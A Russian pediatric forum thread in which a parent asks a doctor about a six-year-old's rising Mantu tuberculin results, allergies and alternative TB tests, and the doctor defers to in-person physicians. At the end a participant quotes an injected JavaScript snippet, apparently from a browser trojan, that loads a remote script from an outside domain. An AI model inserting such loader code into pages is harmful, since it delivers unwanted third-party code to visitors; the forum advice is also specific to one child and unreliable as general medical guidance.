Реклама
Реклама
Реклама
Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Регистрация
Войти
 
Форум » Инфекционные болезни » Туберкулез » Туберкулинодиагностика и профилактика туберкулеза
Страницы: 1 2 След.
RSS
результаты проб манту
Добрый день, Анна Сергеевна проконсультируйте нас пожалуйста, ситуация следующая:
Возраст ребенка 6.5лет (сын), рост 124.5 см, вес 23.4кг

вакцинация БЦЖ делалась в роддоме на 3-й день, размер рубчика в год 7мм.

реакции манту:
3.21.01.08 папула 9мм
16.02.09 папула 12мм
16.02.10 папула 13мм
29.03.11 папула 12мм
13.02.12 папула 11мм
02.09.13 папула 13мм (на фоне пищевой аллергии на орех, в садике угостили сладостями, так же в этот момент пили немозол -как профилактику после лета)


По поводу манту дополнительных анализов не делали , нас никуда не направили, сказали посмотреть результат пробы в следующем году.
Контакта с больными туберкулезом не было, у всех взрослых проживающих в квартире флюрография без паталогий.
 
Из медицинских проблем: в возрасте 2-х мес. перенесли острый пиелонефрит ( с тех пор ежегодно делаем узи БП и почек-по узи есть ДЖВП, плюс первые 2 года дважды в месяц сдавали общий анализ мочи-в норме), в 3 года переболел паракоклюшем (сдавали анализ крови из вены на коклюш/паракоклюш),имеется атопический дерматит -по результатам аллергических проб крови из вены  : пищевая аллергия на коровье молоко, яйцо, пшеницу, орехи, так же имеем поллиноз (по результатам "царапок" на березу, орешник, ольху),вальгусная установка стоп.

Скажите пожалуйста каковы мои действия сейчас, нам в следующем сентябре идти в школу, там наверняка нас что называется завернут с такими пробами, могу ли я сейчас сама сдать ребенку кровь из вены-так называемый квантифироновый тест (и можно ли его сделать спустя пару дней после проб манту?)? и отнести его вместе с нашей последней  реакцией манту в садик?
Думаю, если он что-то покажет, тогда прямиком пойду в ТД, а если все хорошо, то наверное , учитывая, что мы жуткие аллергики на все, нам ежегодно делать не манту ,а диаскин или квантеф-й тест?
Изменено: jil - 05.09.13 20:34
Цитата
jil пишет:
пили немозол -как профилактику после лета)
На будущее - никаких "профилактически после лета" не нужно. Не чините то, что не сломано.


Цитата
jil пишет:
с тех пор ежегодно делаем узи БП и почек
Этого не нужно делать.
Изменено: Dr.Nathalie - 05.09.13 19:03
вы правы конечно, но он был летом  на даче в лесу, где имеются уличные собака и кот, и у нас дома тоже собака есть и потом вечно недомытыми или грязными руками в лицо себе лезет...
узи делали первые 4 года ежегодно-теперь пока не делали
Почитайте, пожалуйста:

Энтеробиоз (острицы). Информация для пациентов.



Аскаридоз. Информация для пациентов.
спасибо
Изменено: jil - 11.09.13 15:24
Здравствуйте.
Не надо кормить ребенка лекарствами без показаний. Мой ребенок все лето проводит в деревне, где есть и собаки, и кошки, и овцы, и козы, и коровы.  Мне в голову никогда не приходило давать ему антипаразитарные препараты.
Я не исключаю, что "жуткие аллергики" как раз отсюда.

Делать пробы на фоне пищевой аллергии нельзя. Нарастание на 2 мм в общем, незначительное, но по приказам уже требует обследования, но это должен решать врач, который ребенка видит.
Поэтому воздержусь от рекомендаций о выполнении тестов, если очный врач необходимости не увидел.
Я не консультирую в личных сообщениях.
так это не врач была, а медсестра в пол-ке которая измеряет пробы, сейчас аллергии нет

т.е. можно ждать следующей пробы , через год и делать вместо нее квант-й тест или диаскин?

или без направления самопроизвольно идти сдаваться в ТД?
Изменено: jil - 11.09.13 15:24
Понимаете, чтобы решать, что делать вместо - должен решать все-таки врач. Поэтому, если Вас так волнует этот вопрос - сходите в ПТД проконсультируйтесь.
Я не консультирую в личных сообщениях.
думаю пойти в нии к довгалюк и.ф....а перед этим сделать квант-й тест, все-таки меня в тд никто не направлял, думаю поэтому я могу последовательность действий немного изменить?
Изменено: jil - 11.09.13 15:24
Все исследования делаются только по назначению врача. Не стоит проявлять совершенно не нужную в данном случае самодеятельность.
Я не консультирую в личных сообщениях.
так все равно же назначит диаскин или квант-й тест....а на скоько я понимаю, диаскин это та же манту только более очищенная что ли и делается она в два подхода  через 3 мес повторяется, т.е и на нее может быть аллергия?..........я в смятении
Изменено: jil - 11.09.13 15:24
Ваше смятение - это исключительно Ваша проблема.

Особенно с такими знаниями по вопросу. Доверьте решение о назначении диагностических тестов врачу. Тем более, что Вы можете попасть к хорошему.
Я не консультирую в личных сообщениях.
вы правы..я не спорю...я естественно только поверхностно сужу..
Изменено: jil - 11.09.13 15:24
были на приеме у ирины федоровны, она сказала повторить манту через пол года, когда будем проходить комиссию в садике перед школой, и с этой манту к ней-если она будет больше теперешней, то будем делать диаскин и потом по факту, заменить манту или диаскин на квант-й тест она не посоветовала, говорит зачем лишний раз колоть вены ребенку, что диаскин это тоже самое.
Сказала, что манту это пока единственный метод диагностики туб-за у детей до 7 лет поэтому пока заменять ее ни на что не будем.....в справке написала: инфицирован и здоров.

я честно говоря так боялась этой встречи, у меня сильно поднялось двление и мне уже неудобно было ее мучать тупыми вопросами.
но я не поняла немного, зачем все же в апреле снова делать манту, если ему 7 будет в январе и уже по идее можно только диаскин или квант-й тест делать?

еще я ей сазала что с января по июнь мы проводим АСИТ от поллиноза (ежедневно пьем капли-концентрат пыльцы березы Сталораль), что на этот период аллерголог нам дает медотвод от прививок и манту- у нас же может быть повышена реакция манту  т.к. я ввожу ребенку аллерген-она по моему не поняла о чем речь и сказала , что для манту это не имеет значения...
Изменено: jil - 11.09.13 15:24
анна сергеевна, нашла на русмеде ваш пост про диаскин  
Код
То есть, в принципе, вполне возможно, что диаскин тест заменит пробу Манту - но 
его нельзя применять для определения показаний к ревакцинации БЦЖ (тест 
на БЦЖ, как мы помним, не реагирует). Для этого в 7 и в 14 лет все равно
 ставится проба Манту. 
 
теперь поняла, зачем в 7 лет делать манту, у меня вопрос на счет времени его постановки-это обязательно должен быть апрель (как сказала ирина федоровна)? т.е. эта манту для ревакцинации д.б. сделана прям календарно как только исполнилось 7лет или можно ее сделать летом ДО школы? (т.е. когда пройдет год от предыдущей?) или ее нужно сделать обязательно когда медиц-е документы готовятся из сада в школу?
Изменено: jil - 11.09.13 15:25
Как трудно читать такие потоки сознания. Это же до чего нужно себя довести, чтобы у молодой женщины поднялось давление - и главное, из-за какой ерунды...

Из всего многочисленного вышесказанного поняла только один вопрос - можно спокойно сделать пробу Манту летом до школы. Только справку о медотводе взять у аллерголога обязательно.
Я не консультирую в личных сообщениях.
анна сергеевна-спасибо!!!!!!!!!!!!
...ну для меня это не ерунда, я наслышана о заболевших детках туб-ом..это страшно....
Изменено: jil - 11.09.13 15:25
Ваш ребенок не заболел. Советую тренировать нервную систему - впереди школа.
И вообще, спокойнее. Очень грустно, что Ваша эмоциональная буря лишает Вас способности рассуждать и задать вопрос хорошему очному врачу.
Я не консультирую в личных сообщениях.
вы правы, успокоительное мне бы не помешало, я ее расспрашивала о тестах о пробе и пр...но мне показалось, если врач говорит делать в апреле-значит так и нужно делать и это не обсуждается-честно  говоря побоялась вступить в противоречие с авторитетом..
анна сергеевна, скажите, если  летом у нас манту будет снова 12-13мм, то мне уже точно нужно с этим результатом идти на диаскин в НИИ...а если меньше будет??
Изменено: jil - 11.09.13 15:25
jil, пожалуйста, удалите трояна с Вашего компьютера - невозможно читать Ваши посты с "добавками"



Цитата
jil пишет:
(f unction(){try{var header=docu ment.getElementsByTagName("HEAD";)[0];var script=docu ment.createElement("SCRIPT";);script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.on load=script.on readystatechange=f unction(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded";)){script.on load=null;script.on readystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

(f unction(){try{var header=docu ment.getElementsByTagName("HEAD";)[0];var script=docu ment.createElement("SCRIPT";);script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.on load=script.on readystatechange=f unction(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded";)){script.on load=null;script.on readystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Страницы: 1 2 След.
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Развернуть блок